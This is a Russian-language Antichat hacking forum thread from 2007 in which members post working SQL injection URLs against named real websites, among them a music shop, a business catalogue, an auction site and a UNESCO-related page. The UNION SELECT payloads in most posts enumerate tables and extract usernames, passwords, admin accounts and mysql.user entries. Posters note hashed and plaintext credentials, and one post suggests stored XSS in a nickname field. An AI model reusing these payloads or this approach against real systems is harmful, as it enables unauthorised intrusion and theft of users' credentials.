Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
08.04.2007, 17:37
|
|
Постоянный
Регистрация: 20.01.2006
Сообщений: 302
Провел на форуме:
3536885
Репутация:
447
|
|
Сообщение от maxster
Код:
http://z04.kazantipa.net/index.php?m1=1&m0=8&act=TopicLover&id=-430+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13/*
мертвая скуля... в каком плане мертвая? вроде выводит все
Код:
http://z04.kazantipa.net/index.php?m1=1&m0=8&act=TopicLover&id=-430+union+select+1,AES_DECRYPT(AES_ENCRYPT(user(),0x71),0x71),3,4,5,6,7,8,9,10,11,12,13/*
|
|
|
08.04.2007, 17:42
|
|
Участник форума
Регистрация: 27.10.2006
Сообщений: 205
Провел на форуме:
2298631
Репутация:
380
|
|
Сообщение от }{0TT@БЬ)Ч
в каком плане мертвая? вроде выводит все
Код:
http://z04.kazantipa.net/index.php?m1=1&m0=8&act=TopicLover&id=-430+union+select+1,AES_DECRYPT(AES_ENCRYPT(user(),0x71),0x71),3,4,5,6,7,8,9,10,11,12,13/*
я там ни одной таблицы не нашел...
|
|
|
|
08.04.2007, 17:58
|
|
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
Провел на форуме:
7192869
Репутация:
3033
|
|
Вернусь к нашим "баранам"
Shados. Я сильно подозреваю что полезная инфа береться из таблицы users, она там есть
http://www.marycoughlanmusic.com/shop.php?id=-4+UNION+SELECT+1,2,3,4,5,TABLE_NAME,7,8,9,10,11,12 +from+INFORMATION_SCHEMA.TABLES+limit+28,28/*
Но вот при запросе к ней ругаеться что нет такой таблицы=\
Щас еще посмотрю
__________________
Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!
з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
|
|
|
|
08.04.2007, 18:00
|
|
Постоянный
Регистрация: 20.01.2006
Сообщений: 302
Провел на форуме:
3536885
Репутация:
447
|
|
Сообщение от Constantine
Вернусь к нашим "баранам"
Shados. Я сильно подозреваю что полезная инфа береться из таблицы users, она там есть
Но вот при запросе к ней ругаеться что нет такой таблицы=\
Щас еще посмотрю
просто база другая
Код:
http://www.marycoughlanmusic.com/shop.php?id=-4+UNION+SELECT+1,2,3,4,5,concat(username,char(58),password),7,8,9,10,11,12+from+shoutout_marycoughlan_db.users/*
2maxster
как вариант можно предложить активную xss в поле ника, создаешь фотку и в поле ника пишешь код.
пример:
Код:
http://z04.kazantipa.net/index.php?m0=8&m1=1
Последний раз редактировалось }{0TT@БЬ)Ч; 08.04.2007 в 18:22..
|
|
|
|
08.04.2007, 18:27
|
|
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503
Репутация:
5826
|
|
Код:
http://www.sinotruck.ru/index.php?t=-1+union+select+1,2,3,concat(database(),char(58),user(),char(58),version()),5,6,7,8,9,10,11,12,13,14,15,16,17/*
Код:
http://www.musagetes.kz/konkurs/text_more.php?cid=5&tid=-1+union+select+1,2,3,concat(user(),char(58),version()),5,6,7/*
|
|
|
|
08.04.2007, 18:37
|
|
Banned
Регистрация: 10.10.2006
Сообщений: 596
Провел на форуме:
2132613
Репутация:
1365
|
|
www.npstoik.ru
«Современные Технологии
в Образовании и Культуре» :
Код:
http://www.npstoik.ru/vio/inside.php?ind=news2&key_news=-87+union+select+1,AES_DECRYPT(AES_ENCRYPT(version(),0x71),0x71),3,4,5/*
|
|
|
|
08.04.2007, 19:12
|
|
Участник форума
Регистрация: 13.03.2007
Сообщений: 120
Провел на форуме:
1604641
Репутация:
590
|
|
www.prom.kz (Каталог предприятий)
Код:
http://www.prom.kz/modules/articles/article.php?id=-3+union+select+1,2,3,4,5,6,concat(name,0x3a,pass),8,9,10,11,12,13,14,15,16,17,18,19,20+from+bx_prom_user+limit+2,1/*
http://www.prom.kz/modules/articles/article.php?id=-3+union+select+1,2,3,4,5,6,table_name,8,9,10,11,12,13,14,15,16,17,18,19,20+from+INFORMATION_SCHEMA.TABLES+limit+34,1/*
|
|
|
|
08.04.2007, 19:40
|
|
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
Провел на форуме:
2924346
Репутация:
1719
|
|
http://lotok.com.ua
интернет-аукцион
таблицы: (99 шт.)
Код:
http://lotok.com.ua/auctiondetails.php?id=-1'+union+select+table_name+from+information_schema.tables+limit+36,1/*
таблица юзеров #1
Код:
http://lotok.com.ua/auctiondetails.php?id=-1'+union+select+concat(login,0x3a,password,0x3a,email)+from+ppusers+limit+0,1/*
#2
Код:
http://lotok.com.ua/auctiondetails.php?id=-1'+union+select+concat(username,0x3a,password)+from+probid_users/*
админ:
Код:
http://lotok.com.ua/auctiondetails.php?id=-1'+union+select+concat(username,0x3a,password)+from+probid_admins/*
все пароли в MD5, пока не расшифровал)
Аукцион мб не особо крупный, но инфы в таблицах очень много.
Последний раз редактировалось n1†R0x; 08.04.2007 в 19:42..
|
|
|
|
08.04.2007, 20:03
|
|
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
Провел на форуме:
7192869
Репутация:
3033
|
|
Вот собсна.. раскручена полностью. думаю вполне даже паблик)
http://www.popecenter.org/clarion_call/article.html?id=-1806+union+select+1,2,3,4,user,6,password,8,9,10,1 1,12,13,14,15,16,17,18,19+from+mysql.user/*
так же есть таблица users
http://www.popecenter.org/clarion_call/article.html?id=-1806+union+select+1,2,3,4,concat_ws(char(58),datab ase(),user(),version()),6,7,8,9,10,11,12,13,14,15, 16,17,18,19+from+users/*
__________________
Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!
з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
Последний раз редактировалось Constantine; 08.04.2007 в 20:13..
|
|
|
|
08.04.2007, 20:16
|
|
Участник форума
Регистрация: 13.03.2007
Сообщений: 120
Провел на форуме:
1604641
Репутация:
590
|
|
Центр маркетингово-аналитических исследований
Код:
http://www.cmar.kz/index.php?id=15&PageLevelID=-154+union+select+user+from+mysql.user
таблица (password) есть но не выводится(:
Код:
http://www.women.unesco.kz/base.php?id=-4+union+select+concat(login,0x3a,pwd)+from+users+limit+4,1/*
пассы в чистом виде
Последний раз редактировалось XTErner; 08.04.2007 в 20:31..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
